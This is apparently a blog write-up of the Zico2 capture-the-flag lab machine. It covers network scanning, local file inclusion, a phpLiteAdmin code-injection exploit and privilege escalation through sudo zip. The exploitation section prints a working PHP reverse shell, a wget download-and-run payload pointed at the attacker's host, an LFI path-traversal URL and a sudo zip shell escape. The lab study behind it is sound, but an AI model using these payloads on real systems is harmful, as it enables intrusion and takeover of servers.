root@V3dedBlog:~#
CTF

Zico2 writeup

Intro

Zico2! Yet another machine to continue our learning journey of enumerating & breaking into systems. How exciting does that sound? Make yourself comfortable and let’s start.


Reconnaissance

Before starting information gathering we need to get the IP of our target box. The method you choose may vary, however I sided with a simple netdiscover ARP scan.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
root@EdgeOfNight:~# netdiscover
Currently scanning: 192.168.178.0/16   |   Screen View: Unique Hosts                                                                                                                                             
                                                                                                                                                                                                                  
43 Captured ARP Req/Rep packets, from 7 hosts.   Total size: 2580                                                                                                                                                
_____________________________________________________________________________
  IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
-----------------------------------------------------------------------------
192.168.1.11     [REDACTED]          7     420     AzureWave Technology Inc.                                                                                                                                      
192.168.1.17     [REDACTED]          6     360     PCS Systemtechnik GmbH                                                                                                                                         
192.168.1.1      [REDACTED]          20    1200    ADB Broadband Italia                                                                                                                                           
192.168.1.10     [REDACTED]          2     120     Unknown vendor                                                                                                                                                 
192.168.1.19     [REDACTED]          2     120     Unknown vendor                                                                                                                                                 
192.168.1.13     [REDACTED]          4     240     LG Innotek                                                                                                                                                     
192.168.1.16     [REDACTED]          2     120     Unknown vendor

Zico vulnerable machine has been assigned an IP of 192.168.1.17!

Let’s port-scan the box and get more intel.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
root@EdgeOfNight:~# nmap -A -v -T5 -sS 192.168.1.17
Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-06 23:32 BST
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 23:32
Completed NSE at 23:32, 0.00s elapsed
Initiating NSE at 23:32
Completed NSE at 23:32, 0.00s elapsed
Initiating ARP Ping Scan at 23:32
Scanning 192.168.1.17 [1 port]
Completed ARP Ping Scan at 23:32, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:32
Completed Parallel DNS resolution of 1 host. at 23:32, 0.00s elapsed
Initiating SYN Stealth Scan at 23:32
Scanning zico (192.168.1.17) [1000 ports]
Discovered open port 22/tcp on 192.168.1.17
Discovered open port 111/tcp on 192.168.1.17
Discovered open port 80/tcp on 192.168.1.17
Warning: 192.168.1.17 giving up on port because retransmission cap hit (2).
Completed SYN Stealth Scan at 23:32, 2.64s elapsed (1000 total ports)
Initiating Service scan at 23:32
Scanning 3 services on zico (192.168.1.17)
Completed Service scan at 23:32, 6.09s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against zico (192.168.1.17)
NSE: Script scanning 192.168.1.17.
Initiating NSE at 23:32
Completed NSE at 23:32, 0.40s elapsed
Initiating NSE at 23:32
Completed NSE at 23:32, 0.01s elapsed
Nmap scan report for zico (192.168.1.17)
Host is up (0.00034s latency).
Not shown: 995 closed ports
PORT      STATE    SERVICE         VERSION
22/tcp    open     ssh             OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)
|   2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)
|_  256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)
80/tcp    open     http            Apache httpd 2.2.22 ((Ubuntu))
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Zico's Shop
111/tcp   open     rpcbind         2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          48498/tcp  status
|_  100024  1          50142/udp  status
2103/tcp  filtered zephyr-clt
44442/tcp filtered coldfusion-auth
MAC Address: 08:00:27:98:69:CA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Uptime guess: 0.054 days (since Fri Oct  6 22:15:15 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.34 ms zico (192.168.1.17)

NSE: Script Post-scanning.
Initiating NSE at 23:32
Completed NSE at 23:32, 0.00s elapsed
Initiating NSE at 23:32
Completed NSE at 23:32, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.06 seconds
           Raw packets sent: 1198 (55.288KB) | Rcvd: 1188 (50.012KB)

Port 20,80 and 111 open - time to enumerate them. With multiple ports available, I usually aim for the webserver first. There are many tools to ease this process such as Nikto, Dirb/Dirbuster, nmap scripts, OWASP-ZAP, wpscan and the list goes on. Nikto, wpscan are common web vulnerability scanners, Dirb & Dirbuster directory bruteforcers. This sort of active scanning takes up a lot of time and therefore it is important to que the scans in right order to save as much time as possible. I proceed to run dirb while I manually browse the webpage for clues.

Webpage:

Time to look around! Top header bar shows us 4 options - about, services, portfolio and contact. All of these just redirect you somewhere within the index page and therefore it’s useless to click them. Scrolling down, there is a segment with a button which says Ok… Show me the tools?! - CHECK THEM OUT!. This is a redirect to http://192.168.1.17/view.php?page=tools.html.

Interesting enough, the URL is possibly prone to Local File Inclusion from the looks of it. http://192.168.1.17/view.php?page=../../../../etc/passwd writes out the content of passwd file which proves the previous statement of possible LFI. Unfortunately LFI only allows us to read files, not upload them. Blindly browsing through the filesystem won’t result in anything. I attempted many tricks such as php://expect, php://filter, /proc/self/environ code execution to improve the current situation… Unfortunately, the results came out blank. Check LFI cheatsheet from HighOnCoffee if any of these things are unclear to you.

LFI PoC:

After an exhausting manual search and not any more clues left, I look back on my dirb result. Look at this wonderful pile of information!

Dirb output:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
root@EdgeOfNight:~# dirb http://192.168.1.17 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Oct  7 00:00:43 2017
URL_BASE: http://192.168.1.17/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.17/ ----
+ http://192.168.1.17/cgi-bin/ (CODE:403|SIZE:288)                                                                                                                                                                
==> DIRECTORY: http://192.168.1.17/css/                                                                                                                                                                           
==> DIRECTORY: http://192.168.1.17/dbadmin/                                                                                                                                                                       
==> DIRECTORY: http://192.168.1.17/img/                                                                                                                                                                           
+ http://192.168.1.17/index (CODE:200|SIZE:7970)                                                                                                                                                                  
+ http://192.168.1.17/index.html (CODE:200|SIZE:7970)                                                                                                                                                             
==> DIRECTORY: http://192.168.1.17/js/                                                                                                                                                                            
+ http://192.168.1.17/LICENSE (CODE:200|SIZE:1094)                                                                                                                                                                
+ http://192.168.1.17/package (CODE:200|SIZE:789)                                                                                                                                                                 
+ http://192.168.1.17/server-status (CODE:403|SIZE:293)                                                                                                                                                           
+ http://192.168.1.17/tools (CODE:200|SIZE:8355)                                                                                                                                                                  
==> DIRECTORY: http://192.168.1.17/vendor/                                                                                                                                                                        
+ http://192.168.1.17/view (CODE:200|SIZE:0)                                                                                                                                                                      
                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.17/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.17/dbadmin/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.17/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.17/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.17/vendor/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Sat Oct  7 00:00:49 2017
DOWNLOADED: 4612 - FOUND: 8  

As a result of this we find many hidden accessible directories such as /dbadmin/, /js/, /vendor/ and /view/. /dbadmin/ sounds like an interesting one, so let’s see what it shows.

The php file leads to:

Before any bruteforcing attempt, I usually search for already known exploit corresponding to a service version. There are many ways of doing this, like using searchsploit or Google. Searchsploit query for phpLiteAdmin v1.9.3

1
2
3
4
5
6
7
root@EdgeOfNight:~# searchsploit phpLiteAdmin 1.9.3
------------------------------------------------------------------ ----------------------------------
 Exploit Title                                                    |  Path
                                                                  | (/usr/share/exploitdb/platforms/)
------------------------------------------------------------------ ----------------------------------
PHPLiteAdmin 1.9.3 - Remote PHP Code Injection                    | php/webapps/24044.txt
------------------------------------------------------------------ ----------------------------------

shows us that there indeed is an exploitable vulnerability which allows for PHP remote code execution after authentication. As always I tend to overcomplicate things and launch a hydra bruteforce attack, only then realizing the password was set to default this whole time. Now that we have the password admin let’s get our reverse shell via php!


Exploitation

If you have read the searchsploit file, getting the shell will be easy. There are of course many ways to approach this vulnerability, but I chose the following:

  1. Make a txt file inside /var/www/html with <?php $sock=fsockopen("192.168.1.12",1234); exec("/bin/sh -i <&3 >&3 2>&3");?> (this is our reverse shell - taken from pentestmonkey)
  2. Start an apache web server using /etc/init.d/apache2 start

To proceed with our exploitation, do as the exploitdb file says. Create a database with a .php extension (in my case shell.php):

Add a table inside it called shell, select 1 field:

Name the field whatever we wish, set it as text type, put <?php system("wget 192.168.1.12/shell.txt -O /tmp/shell.php; php /tmp/shell.php"); ?> into the default value & click create. This should create a new table with our exploit. The default value script plays a huge role here as it is used to download our main php reverse shell.

wget - downloads the the main file on the target machine

-O /tmp/shell.php - converts the text file into php (this is used to prevent activation of php payload on our server) and saves it inside /tmp folder

;php /tmp/shell.php - runs the php file with our malicious payload inside

In order to activate our side script which downloads the malicious file, an HTTP request is needed. How would we do this though? I quickly reminded myself of the LFI vulnerability which allows me to browse the file system. All databases are located at /usr/share/databases/ as it can be seen on the phpliteadmin side panel. See where I’m going? Start our netcat listener nc -lvp 1234 and make an HTTP request via 192.168.1.17/view.php?page=../../../../usr/databases/shell.php

Boom! A reverse connection has been made :).


Privilege Escalation

Time to snoop! (I stole that phrase from g0blin heh :P). There is nothing of interest inside /var/ and /tmp/ folders. All that remains is closer inspection of /home/zico/ which is present with many CMS files.

After some exploration I discovered a wp-config.php (inside /wordpress/) file which has zico’s login credentials.

Use them to connect via ssh: ssh zico@192.168.1.17 and enumerate more with a nice TTY shell and job control. sudo -l shows that we can use zip or tar combined with sudo without providing a password.

This creates a security hole prone to privilege escalation vulnerability! Just make a random file using touch command (touch exploit) and zip it using this command:

1
zico@zico:/tmp$ sudo zip exploit.zip exploit -T --unzip-command="python -c 'import pty; pty.spawn(\"/bin/sh\")'"

1
2
3
sudo - execute as superuser
-T   - check the file integrity, execcutes the --unzip-command parameter (this command grants us a shell)
--unzip-command="python -c 'import pty; pty.spawn(\"/bin/sh\")'" - spawns a /bin/sh shell

Rooted!


Conclusion

Sorry for making this blog so lenghty! Sure, it was a long read, but I hope you atleast learnt a thing or two. Props to the author - Rafael for making such an awesome machine. It sure was fun!

If you have any questions feel free to reach out to me via my about page or comments below. ~V3